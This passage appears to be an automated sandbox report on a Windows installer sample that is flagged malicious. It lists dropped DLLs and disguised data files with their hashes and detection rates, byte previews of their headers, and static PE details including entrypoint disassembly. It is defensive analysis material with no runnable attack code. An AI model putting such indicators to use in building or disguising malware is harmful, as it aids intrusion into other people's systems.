                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtGui4.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):8581632
                                                                                                                                                                Entropy (8bit):6.736578346160889
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                                MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                                SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                                SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                                SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtNetwork4.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1053696
                                                                                                                                                                Entropy (8bit):6.539052666912709
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\QtXml4.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):356352
                                                                                                                                                                Entropy (8bit):6.447802510709224
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6487736
                                                                                                                                                                Entropy (8bit):7.518089126573906
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\StarBurn.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):664064
                                                                                                                                                                Entropy (8bit):6.953961612144461
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\hypochondriac.xlsx

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60283
                                                                                                                                                                Entropy (8bit):4.569551839311306
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcp100.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):421200
                                                                                                                                                                Entropy (8bit):6.59808962341698
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\msvcr100.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):770384
                                                                                                                                                                Entropy (8bit):6.908020029901359
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\wiggery.bmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4485813
                                                                                                                                                                Entropy (8bit):7.960501110953352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:zvf5BQTYhbOg6IdJogvR31mRCbJ2O4qm08UhFdFtZ7C5Bd6wKWgSKNKk8R:zvhy2cW31mRCbEqf8UhFiBdQ+kO
                                                                                                                                                                MD5:B56FE6EA5F9CAFB0C73A95A3377C8CA1
                                                                                                                                                                SHA1:252F48E39D28A5554152F32F23A406E4E9E752DD
                                                                                                                                                                SHA-256:04C5B808B740AC5F17B12956AD0D1B2C21EA1D6A6011275AC2A0D08B454EDB6A
                                                                                                                                                                SHA-512:1A094CD5029F1D2BD0E804EC7F1911CF25CE319BEF3EB03BC57DF09A5BCF5957C813F9F7FF57B936F0596E0E00F3B447E2E2C3B5BAE9F3AD99BEB63C441DC0D7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.b...C.y.y.m..L......\^..n.N.HQ..n.Eh.....l..q.JY.kE....peI.k.c..mE..c.Lr\p...ZTW.X.qo.s.x..HHb.f.aq..s.\E^^mYoR_Cb...].xBM.xR.[.kpg.MGx_.x.Xkx..._...jilM.[.CAm....tV...wtM...ywlI..yU.S.WQHig..w.].Sx_QX]...LLL_sC.P.y.pj.TgH.C..dOC.RqnoF....Qv.....b.m..M.]X.L.hvbeZ..f.ma....tNrr.Cbe..S..Yvnjbh...C..mqWsjglcP.W.Mu.TIq..fYcf.K..WbMIp...IRn[.G..Y..V.._..]..L].U...L]O..L.uHt`.._VBuVd.hK.DhxRlwPY[...xo....F^SLA.....[gXWLVF.......wX.w.b...nlUr.E.D...UN.f..JM.f.T.CF.....yO.RmS]..d.^e...O..b.^\K^.......kc[U...yfym...Vc..a.oUd.rD.kDWFLcL.UIZM.cfQK.e^..hvr.oxq.FI..QNP...LQT..q...h..i_.hA.mu.d......HKg.UK...tL...x...q^...h.._.q.LT.g.t]do.BM.S.HKj[..q..R.[O^.E.IV.v..hfA.mh..^N..h.......Th..shY...xLOtm\Jl.\fZ..g.b.b.`....A.ao.f..^.y...of...B..y....R..W.P..nYuE..F.X...Wv.V..\^.rR.^..X....]gxml.ukp.Vc.f.F..A...K....Pix.IObhW_^C...^.....A.y..QUH.vg.W\o..hZ......MM....gK..L..m...E..T.O.i....pNt.Y..J...tD.n_...]JEfbw.p...f.^^.I..Y..L..QJb.M.i.H..........q..u..W^...Kv.T.y..fCeqB.l......bDm...._xd.].p.l..U

                                                                                                                                                                C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14302064
                                                                                                                                                                Entropy (8bit):7.991632876953663
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:393216:naTis2twlNkiqrp/dKXKdt08/dEy0z+Zm1X8SN3y0rJEMlw:naTutwjk93KXHaZ06Zm1MSN3jw
                                                                                                                                                                MD5:2C6652F7E01283DE091B5200B7878E69
                                                                                                                                                                SHA1:C7503315A496A65C28E4BE9FB397FFB830C54F8F
                                                                                                                                                                SHA-256:C1E1F6EB7AC42447F53711EAE48AF5B53FB6D75C9CE43CF7E4EDC413CCFB36F4
                                                                                                                                                                SHA-512:896B0BBD6E8F9E64472589A92C52537FC0140D9E05856A8E2578734E6C0D3D5D57562A63598FCB6E5A20CEA153C74884505D25E2971061DDA45C82F30C3B23AF
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Gc..............Hz......Hz.....L~......L~......L~..(...k..W...Hz......Hz......Hz..........^....~.......~,.......D......~......Rich............................PE..L....p-d..............."............Pj............@.......................................@.................................H............N...................P..h_..`...T...............................@....................... ....................text...9........................... ..`.rdata..L...........................@..@.data...............................@....didat..............................@....wixburn0...........................@..@.rsrc....N.......P..................@..@.reloc..h_...P...`..................@..B........................................................................................................................................................................................

                                                                                                                                                                Static File Info

                                                                                                                                                                General

                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Entropy (8bit):7.991646972369456
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:kXzODlqJak.exe
                                                                                                                                                                File size:14'323'584 bytes
                                                                                                                                                                MD5:ab79eafcce0d6eff856b259977e480e1
                                                                                                                                                                SHA1:736603a24e9b143a644c1fe3673c7ac7fbeee37c
                                                                                                                                                                SHA256:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075
                                                                                                                                                                SHA512:1aaaffb13ac1d9d400c3409ab00398fca33c1e118e4e9f8f6e1c4534f632693086d5f2525930b92473fb784551d4853679ea1cf7e395ab6dd7dfb138e6957f07
                                                                                                                                                                SSDEEP:393216:naTis2twlNkiqrp/dKXKdt08/dEy0z+Zm1X8SN3y0rJEMl7:naTutwjk93KXHaZ06Zm1MSN3j7
                                                                                                                                                                TLSH:CCE63331A1A2303FE6F52DB3B92496343D6CB2181B5486FEC6D0E84D38689D56EF7346
                                                                                                                                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Gc..............Hz......Hz......L~......L~......L~..(....k..W...Hz......Hz......Hz..........^....~.......~,.......D......~.....

                                                                                                                                                                File Icon

                                                                                                                                                                Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                Static PE Info

                                                                                                                                                                General

                                                                                                                                                                Entrypoint:0x446a50
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x642D70FB [Wed Apr 5 13:00:43 2023 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:6
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:6
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:657e40fb09b2c5e277b865a7cf2b8089

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                call 00007FB39D11DB28h
                                                                                                                                                                jmp 00007FB39D11D51Dh
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                retn 0000h
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                                                                mov ecx, dword ptr [esp+10h]
                                                                                                                                                                or ecx, eax
                                                                                                                                                                mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                jne 00007FB39D11D6ABh
                                                                                                                                                                mov eax, dword ptr [esp+04h]
                                                                                                                                                                mul ecx
                                                                                                                                                                retn 0010h
                                                                                                                                                                push ebx
                                                                                                                                                                mul ecx
                                                                                                                                                                mov ebx, eax
                                                                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                                                                mul dword ptr [esp+14h]
                                                                                                                                                                add ebx, eax
                                                                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                                                                mul ecx
                                                                                                                                                                add edx, ebx
                                                                                                                                                                pop ebx
                                                                                                                                                                retn 0010h
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                push ebx
                                                                                                                                                                push esi
                                                                                                                                                                mov eax, dword ptr [esp+18h]
                                                                                                                                                                or eax, eax
                                                                                                                                                                jne 00007FB39D11D6BAh
                                                                                                                                                                mov ecx, dword ptr [esp+14h]
                                                                                                                                                                mov eax, dword ptr [esp+10h]
                                                                                                                                                                xor edx, edx
                                                                                                                                                                div ecx
                                                                                                                                                                mov ebx, eax
                                                                                                                                                                mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                div ecx
                                                                                                                                                                mov edx, ebx
                                                                                                                                                                jmp 00007FB39D11D6E3h
                                                                                                                                                                mov ecx, eax
                                                                                                                                                                mov ebx, dword ptr [esp+14h]
                                                                                                                                                                mov edx, dword ptr [esp+10h]
                                                                                                                                                                mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                shr ecx, 1
                                                                                                                                                                rcr ebx, 1
                                                                                                                                                                shr edx, 1
                                                                                                                                                                rcr eax, 1
                                                                                                                                                                or ecx, ecx
                                                                                                                                                                jne 00007FB39D11D696h
                                                                                                                                                                div ebx
                                                                                                                                                                mov esi, eax
                                                                                                                                                                mul dword ptr [esp+18h]
                                                                                                                                                                mov ecx, eax
                                                                                                                                                                mov eax, dword ptr [esp+14h]
                                                                                                                                                                mul esi
                                                                                                                                                                add edx, ecx
                                                                                                                                                                jc 00007FB39D11D6B0h
                                                                                                                                                                cmp edx, dword ptr [esp+10h]
                                                                                                                                                                jnbe 00007FB39D11D6AAh
                                                                                                                                                                jc 00007FB39D11D6A9h
                                                                                                                                                                cmp eax, dword ptr [esp+0Ch]
                                                                                                                                                                jbe 00007FB39D11D6A3h
                                                                                                                                                                dec esi
                                                                                                                                                                xor edx, edx
                                                                                                                                                                mov eax, esi
                                                                                                                                                                pop esi
                                                                                                                                                                pop ebx
                                                                                                                                                                retn 0010h

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9a7480xb4.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x4efc.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000x5f68.reloc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x995600x54.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x995c00x18.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x991e00x40.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x6e0000x3f8.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x9a2a40x120.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000x6c1390x6c20092efecf5cfa9e863e69713e8451295ebFalse0.5022376264450867data6.489848341668886IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rdata0x6e0000x2de4c0x2e000c796b8ce19f947fe45f2a6998482442bFalse0.27885636039402173data5.073579231118804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
